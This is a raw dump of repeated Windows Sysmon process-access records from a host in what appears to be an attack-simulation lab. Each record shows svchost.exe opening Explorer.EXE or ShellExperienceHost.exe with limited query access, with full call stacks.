07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 